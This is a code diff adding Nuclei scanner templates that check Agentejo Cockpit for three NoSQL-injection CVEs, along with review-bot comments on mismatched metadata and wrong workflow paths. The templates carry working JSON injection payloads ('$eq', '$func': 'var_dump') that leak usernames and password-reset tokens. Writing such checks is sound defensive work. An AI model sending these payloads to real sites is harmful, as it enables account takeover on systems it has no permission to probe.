diff --git a/cves/2020/CVE-2020-35846.yaml b/cves/2020/CVE-2020-35846.yaml
new file mode 100644
index 0000000000..35f6119a3c
--- /dev/null
+++ b/cves/2020/CVE-2020-35846.yaml
@@ -0,0 +1,39 @@
+id: CVE-2020-35846
+
+info:
+ name: Cockpit prior to 0.12.0 NoSQL injection in /auth/check
+ author: dwisiswant0
+ severity: critical
+ description: |
+ Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function.
+ The $eq operator matches documents where the value of a field equals the specified value.
+ reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
+ tags: cve,cve2020,nosqli,sqli
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/auth/check"
+ headers:
+ Content-Type: application/json
+ body: |
+ {
+ "auth": {
+ "user": {
+ "$eq": "admin"
+ },
+ "password": [
+ 0
+ ]
+ }
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - "password_verify() expects parameter"
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-35847.yaml b/cves/2020/CVE-2020-35847.yaml
new file mode 100644
index 0000000000..63bd5e764d
--- /dev/null
+++ b/cves/2020/CVE-2020-35847.yaml
@@ -0,0 +1,35 @@
+id: CVE-2020-35847
+
+info:
+ name: Cockpit prior to 0.12.0 NoSQL injection in /auth/resetpassword
+ author: dwisiswant0
+ severity: critical
+ description: |
+ resetpassword method of the Auth controller,
+ which is responsible for changing the user password using the reset token.
+ reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
+ tags: cve,cve2020,nosqli,sqli
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/auth/requestreset"
+ headers:
+ Content-Type: application/json
+ body: |
+ {
+ "user": {
+ "$func": "var_dump"
+ }
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: regex
+ part: body
+ regex:
+ - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9]+)"'
\ No newline at end of file
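Review bot: The `info` block states two different affected-version bounds: `name` says "prior to 0.12.0" while `description` says "Cockpit before 0.11.2"; pick the one that matches the reference so the template's version claim is unambiguous. The second description sentence documents what the generic `$eq` operator does rather than the finding itself and could be dropped or replaced by a sentence saying why the check function is injectable, e.g. `The check function passes the JSON user value straight into the database query, so query operators supplied by the client are evaluated.` The `tags` list also carries both `nosqli` and `sqli` here and in the CVE-2020-35847 and CVE-2020-35848 templates; unless the repository deliberately uses `sqli` as an umbrella tag, the `sqli` entry is misleading for a NoSQL injection.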
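Review bot: The metadata and the request disagree about the endpoint: `name` advertises `/auth/resetpassword` and the description talks about the resetpassword method, but `path` sends the probe to `{{BaseURL}}/auth/requestreset`. One of the two is wrong; fix whichever does not match the intended check so the template documents what it actually exercises. The `description` is also a sentence fragment that describes what the method is for and never states the vulnerability, for example `description: Cockpit prior to 0.12.0 allows NoSQL injection through the Auth controller's password-reset handling, which accepts query operators in the JSON body.` The CVE-2020-35848 template in the next hunk has the same fragment-style description and should be reworded the same way.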
diff --git a/cves/2020/CVE-2020-35848.yaml b/cves/2020/CVE-2020-35848.yaml
new file mode 100644
index 0000000000..774a716548
--- /dev/null
+++ b/cves/2020/CVE-2020-35848.yaml
@@ -0,0 +1,35 @@
+id: CVE-2020-35848
+
+info:
+ name: Cockpit prior to 0.12.0 NoSQL injection in /auth/newpassword
+ author: dwisiswant0
+ severity: critical
+ description: |
+ newpassword method of the Auth controller,
+ which is responsible for displaying the user password reset form.
+ reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
+ tags: cve,cve2020,nosqli,sqli
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/auth/newpassword"
+ headers:
+ Content-Type: application/json
+ body: |
+ {
+ "token": {
+ "$func": "var_dump"
+ }
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: regex
+ part: body
+ regex:
+ - 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"'
\ No newline at end of file
diff --git a/technologies/cockpit-detect.yaml b/technologies/cockpit-detect.yaml
new file mode 100644
index 0000000000..30bf745acc
--- /dev/null
+++ b/technologies/cockpit-detect.yaml
@@ -0,0 +1,15 @@
+id: cockpit-detect
+
+info:
+ name: Detect Agentejo Cockpit
+ author: dwisiswant0
+ severity: info
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/auth/login"
+ matchers:
+ - type: word
+ words:
+ - "Authenticate Please!"
diff --git a/workflows/cockpit-workflow.yaml b/workflows/cockpit-workflow.yaml
new file mode 100644
index 0000000000..fb5435c3fe
--- /dev/null
+++ b/workflows/cockpit-workflow.yaml
@@ -0,0 +1,14 @@
+id: cockpit-workflow
+
+info:
+ name: Agentejo Cockpit Security Checks
+ author: dwisiswant0
+ description: A simple workflow that runs all Agentejo Cockpit related nuclei templates on a given target.
+ tags: workflow
+
+workflows:
+ - template: technologies/cockpit-detect.yaml
+ subtemplates:
+ - template: cve/2020/CVE-2020-35846.yaml
+ - template: cve/2020/CVE-2020-35847.yaml
+ - template: cve/2020/CVE-2020-35848.yaml
\ No newline at end of file
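Review bot: The detect template's `info` has neither `tags` nor `description`, unlike the three CVE templates in this commit, so it cannot be selected by tag filtering and gives a reader no hint of what the login-page string identifies; a one-line `description` and a `tags` entry naming the product (the repository's own tag convention should decide the exact value) would bring it in line. The word matcher also omits `part`, presumably falling back to the response body; the CVE templates spell out `part: body`, and doing so here would make the match target explicit rather than implied.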
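Review bot: The three `subtemplates` entries reference `cve/2020/…`, but this commit adds those files under `cves/2020/` (see the `+++ b/cves/2020/CVE-2020-35846.yaml` header and its siblings), so the workflow will not resolve its subtemplates unless a separate `cve/` directory exists in the repository. Change them to `- template: cves/2020/CVE-2020-35846.yaml`, `- template: cves/2020/CVE-2020-35847.yaml` and `- template: cves/2020/CVE-2020-35848.yaml`, or move the files to match. This file and the three CVE templates are also committed without a trailing newline, as the `\ No newline at end of file` markers show; adding one keeps future diffs and linters quiet.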